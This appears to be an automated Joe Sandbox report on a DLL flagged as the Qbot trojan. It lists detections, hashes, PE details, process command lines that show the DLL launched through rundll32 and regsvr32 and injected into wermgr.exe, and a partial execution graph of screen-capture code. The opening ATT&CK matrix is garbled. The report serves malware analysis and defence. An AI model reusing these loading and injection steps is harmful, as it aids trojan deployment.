          DLL Side-Loading          		311
          Process Injection          		1
          Masquerading          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Screen Capture          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Virtualization/Sandbox Evasion          		LSASS Memory11
          Security Software Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)311
          Process Injection          		Security Account Manager1
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Regsvr32          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Rundll32          		Cached Domain Credentials15
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 715156 Sample: pebbles.dat.dll Startdate: 03/10/2022 Architecture: WINDOWS Score: 96 31 Malicious sample detected (through community Yara rule) 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected Qbot 2->35 37 3 other signatures 2->37 8 loaddll32.exe 1 2->8         started        process3 process4 10 rundll32.exe 8->10         started        13 cmd.exe 1 8->13         started        15 regsvr32.exe 8->15         started        17 3 other processes 8->17 signatures5 47 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 10->47 49 Writes to foreign memory regions 10->49 51 Allocates memory in foreign processes 10->51 19 wermgr.exe 8 1 10->19         started        22 rundll32.exe 13->22         started        53 Maps a DLL or memory area into another process 15->53 25 wermgr.exe 15->25         started        process6 file7 29 C:\Users\user\Desktop\pebbles.dat.dll, PE32 19->29 dropped 39 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 22->39 41 Writes to foreign memory regions 22->41 43 Allocates memory in foreign processes 22->43 45 Maps a DLL or memory area into another process 22->45 27 wermgr.exe 22->27         started        signatures8 process9

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          pebbles.dat.dll17%ReversingLabs
          pebbles.dat.dll100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.rundll32.exe.3460000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          5.2.rundll32.exe.4a60000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          3.2.regsvr32.exe.3160000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          8.2.wermgr.exe.2d40000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          7.0.wermgr.exe.2c60000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          8.0.wermgr.exe.2d40000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          7.2.wermgr.exe.2c60000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          9.0.wermgr.exe.29b0000.0.unpack100%AviraHEUR/AGEN.1234562Download File

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          No contacted domains info

          World Map of Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:715156
          Start date and time:2022-10-03 17:26:43 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 10m 25s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:pebbles.dat.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:22
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal96.troj.evad.winDLL@20/1@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 25.4% (good quality ratio 24.2%)
          • Quality average: 77.4%
          • Quality standard deviation: 26%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 40
          • Number of non-executed functions: 44
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Override analysis time to 240s for rundll32

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): fs.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          17:27:47API Interceptor9x Sleep call for process: wermgr.exe modified

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\Desktop\pebbles.dat.dll

          Download File
          Process:C:\Windows\SysWOW64\wermgr.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):4096
          Entropy (8bit):4.667100449217363
          Encrypted:false
          SSDEEP:96:UORfeVXzt2Dk1dyqIF9JhsLwAOhf2ZW2wIPD:UORAjMkXIKPD
          MD5:21928784DA52AB71A60AF59EFA95CDAD
          SHA1:4FF8ECD9B0370614EA0C3D8583A51DF9D2481844
          SHA-256:285861283C9DC3F2D892B3CC186AD64CF17217D394B227A70B6C657C39D6568B
          SHA-512:CD79DFD111B8E1E8A3EB2F7E57DFB71D76AF677D6696564C15413391D7734F0C4A10D3987A3D4D9739C082C0710BC5B8566A4D4AB295EA501B5D909D0294C3F8
          Malicious:true
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.....~[..~[..~[..}Z..~[..{Z..~[..zZ..~[I.zZ..~[I.}Z..~[I.{ZX.~[...Z..~[...[o.~[..wZ..~[..~Z..~[..[..~[...[..~[..|Z..~[Rich..~[........................PE..L.....:c...........!.........~..............0............................................@..........................p.......A..P................................6......p...........................0...@............@...............................data....a.......b.................. ....reloc6s.............f.............. ..`CODE.........0...........................idata..0....@......................@..@.hata....5...P...6..................@..@DATA....T............J..............@..@.rsrc................L..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................

          Static File Info

          General

          File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Entropy (8bit):6.9607693404023925
          TrID:
          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
          • Generic Win/DOS Executable (2004/3) 0.20%
          • DOS Executable Generic (2002/1) 0.20%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:pebbles.dat.dll
          File size:493056
          MD5:d89521adaf6418e6ebe43b1a1a9d2af9
          SHA1:38cac8495ef43e51cdac1cb5e85d10137b365bee
          SHA256:1965dc57456d4fc01b6ce0f242d80776fe08a16354e6177255cba618348355ac
          SHA512:703db1e11372070dbbabc8a96c8600f079273e4dfad4e5437a5fd4b046187cf9f24b47ad68fadaf3bcf7fb1dcad8ecf98edd299281938eb144c4c6c29d68461f
          SSDEEP:12288:Y2X+B4HKFVxT5jXAcOf35HI9H5RGqdIhr54f:L5EVl5DC4HDbd
          TLSH:DBA48D0AB612C430D66910B12876BBE047ACBD325E751EDF73805F778A641F77A29F22
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.....~[..~[..~[..}Z..~[..{Z..~[..zZ..~[I.zZ..~[I.}Z..~[I.{ZX.~[...Z..~[...[o.~[..wZ..~[..~Z..~[...[..~[...[..~[..|Z..~[Rich..~

          File Icon

          Icon Hash:74f0e4ecccdce0e4

          Static PE Info

          General

          Entrypoint:0x100382d9
          Entrypoint Section:.data
          Digitally signed:false
          Imagebase:0x10000000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
          Time Stamp:0x633AE6FF [Mon Oct 3 13:43:27 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:8877a7b766af3aace7fcad8462a174cc

          Entrypoint Preview

          Instruction
          push ebp
          mov ebp, esp
          cmp dword ptr [ebp+0Ch], 01h
          jne 00007F5C910C8327h
          call 00007F5C910C8844h
          push dword ptr [ebp+10h]
          push dword ptr [ebp+0Ch]
          push dword ptr [ebp+08h]
          call 00007F5C910C81D3h
          add esp, 0Ch
          pop ebp
          retn 000Ch
          cmp ecx, dword ptr [10001D84h]
          jne 00007F5C910C8323h
          ret
          jmp 00007F5C910C892Dh
          mov ecx, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], ecx
          pop ecx
          pop edi
          pop edi
          pop esi
          pop ebx
          mov esp, ebp
          pop ebp
          push ecx
          ret
          push eax
          push dword ptr fs:[00000000h]
          lea eax, dword ptr [esp+0Ch]
          sub esp, dword ptr [esp+0Ch]
          push ebx
          push esi
          push edi
          mov dword ptr [eax], ebp
          mov ebp, eax
          mov eax, dword ptr [10001D84h]
          xor eax, ebp
          push eax
          push dword ptr [ebp-04h]
          mov dword ptr [ebp-04h], FFFFFFFFh
          lea eax, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], eax
          ret
          push eax
          push dword ptr fs:[00000000h]
          lea eax, dword ptr [esp+0Ch]
          sub esp, dword ptr [esp+0Ch]
          push ebx
          push esi
          push edi
          mov dword ptr [eax], ebp
          mov ebp, eax
          mov eax, dword ptr [10001D84h]
          xor eax, ebp
          push eax
          mov dword ptr [ebp-10h], esp
          push dword ptr [ebp-04h]
          mov dword ptr [ebp-04h], FFFFFFFFh
          lea eax, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], eax
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push ecx
          lea ecx, dword ptr [esp+08h]
          sub ecx, eax
          and ecx, 0Fh
          add eax, ecx
          sbb ecx, ecx
          or eax, ecx

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x570100x10f.data
          IMAGE_DIRECTORY_ENTRY_IMPORT0x741880x50.idata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000x1e0.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x7b0000x36b4.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x311c00x70.data
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x312300x40.data
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x740000x184.idata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .data0x10000x5611f0x56200False0.6558956594702468data7.0153365923230595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .reloc6s0x580000x1a0f90x1a200False0.3239383971291866COM executable for DOS6.066972398111804IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          CODE0x730000x2000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .idata0x740000xa300xc00False0.404296875data4.897788340416598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .hata0x750000x35e70x3600False0.7127459490740741data5.561450278641814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          DATA0x790000x540x200False0.162109375data1.2433795844140498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc0x7a0000x1e00x200False0.53125data4.724728911998389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x7b0000x36b40x3800False0.7310267857142857data6.633507194727193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          RT_MANIFEST0x7a0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

          Imports

          DLLImport
          KERNEL32.dllSleep, DebugBreak, GetCurrentProcess, lstrlenA, GetCurrentThreadId, lstrcmpA, VirtualAlloc, GetVersion, GetCommandLineA, GetFileAttributesA, GetCurrentThread, GetCurrentProcessId, GetModuleHandleW, lstrcmpiA, CreateFileW, CloseHandle, GetModuleHandleA, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetStdHandle, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, MoveFileExW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetFilePointerEx, WriteConsoleW
          ADVAPI32.dllCryptCreateHash, CryptHashData, CryptDestroyHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextA
          SHLWAPI.dllPathFindExtensionA, PathFindOnPathA, PathFileExistsA, PathFindSuffixArrayA, StrToIntA

          Exports

          NameOrdinalAddress
          DllRegisterServer10x1006eb00
          DllUnregisterServer20x1006f6f0
          bewailable30x10058e00
          courtlet40x10063590
          noncensored50x10067e60
          rhizocarpean60x100605f0
          stine70x10069040
          strigiles80x1005de90
          targetlike90x1006b820
          trimethoxy100x10061fd0

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States

          Network Behavior

          No network behavior found

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:17:27:36
          Start date:03/10/2022
          Path:C:\Windows\System32\loaddll32.exe
          Wow64 process (32bit):true
          Commandline:loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"
          Imagebase:0x1200000
          File size:116736 bytes
          MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          General

          Target ID:1
          Start time:17:27:37
          Start date:03/10/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6edaf0000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:2
          Start time:17:27:37
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Imagebase:0xa60000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:3
          Start time:17:27:37
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline:regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Imagebase:0x8c0000
          File size:20992 bytes
          MD5 hash:426E7499F6A7346F0410DEAD0805586B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          General

          Target ID:4
          Start time:17:27:37
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Imagebase:0x1280000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          General

          Target ID:5
          Start time:17:27:37
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer
          Imagebase:0x1280000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          General

          Target ID:6
          Start time:17:27:40
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer
          Imagebase:0x1280000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:7
          Start time:17:27:43
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x970000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          Reputation:moderate

          General

          Target ID:8
          Start time:17:27:43
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x970000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          General

          Target ID:9
          Start time:17:27:43
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x970000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          General

          Target ID:10
          Start time:17:27:44
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable
          Imagebase:0x1280000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:6.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:5.1%
            Total number of Nodes:2000
            Total number of Limit Nodes:51
            execution_graph 13964 3165f94 13970 3168dc9 RtlAllocateHeap 13964->13970 13966 3166012 13968 316a1f8 GetSystemTimeAsFileTime 13969 3165fa9 13968->13969 13969->13966 13969->13968 13971 3165d1e GetDC 13969->13971 13970->13969 13972 3165f3e 13971->13972 13973 3165d50 CreateCompatibleDC 13971->13973 13974 3168ddf 2 API calls 13972->13974 13973->13972 13975 3165d61 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 13973->13975 13976 3165f5d 13974->13976 13975->13972 13977 3165d8c SelectObject 13975->13977 13978 3168ddf 2 API calls 13976->13978 13977->13972 13979 3165d9f BitBlt GetCursorInfo 13977->13979 13980 3165f68 13978->13980 13981 3165e25 SelectObject 13979->13981 13982 3165dd0 13979->13982 13983 3165f76 13980->13983 13984 3165f6f DeleteDC 13980->13984 13981->13972 13986 3165e39 GetObjectW 13981->13986 13982->13981 13985 3165dd5 CopyIcon GetIconInfo GetObjectW DrawIconEx 13982->13985 13988 3165f81 13983->13988 13989 3165f7a DeleteDC 13983->13989 13984->13983 13985->13981 13997 3168dc9 RtlAllocateHeap 13986->13997 13991 3165f85 DeleteObject 13988->13991 13992 3165f8c 13988->13992 13989->13988 13990 3165ea2 13990->13972 13993 3165eae GetDIBits 13990->13993 13991->13992 13992->13969 13998 3168dc9 RtlAllocateHeap 13993->13998 13995 3165ed4 13995->13972 13996 316fbfb 18 API calls 13995->13996 13996->13972 13997->13990 13998->13995 13999 3161295 14000 316aab0 4 API calls 13999->14000 14001 31612ac 14000->14001 14002 31612d1 14001->14002 14003 31736d5 2 API calls 14001->14003 14037 316117d 14002->14037 14003->14002 14006 3161306 14007 316ab83 4 API calls 14008 3161316 14007->14008 14036 31613d4 14008->14036 14044 3167c67 14008->14044 14009 316b305 4 API calls 14011 31613eb 14009->14011 14013 316b3f2 5 API calls 14011->14013 14016 31613f7 14013->14016 14014 316133d 14023 3168ddf 2 API calls 14014->14023 14015 3161371 14019 316b305 4 API calls 14015->14019 14232 3167aa7 14016->14232 14017 316ab83 4 API calls 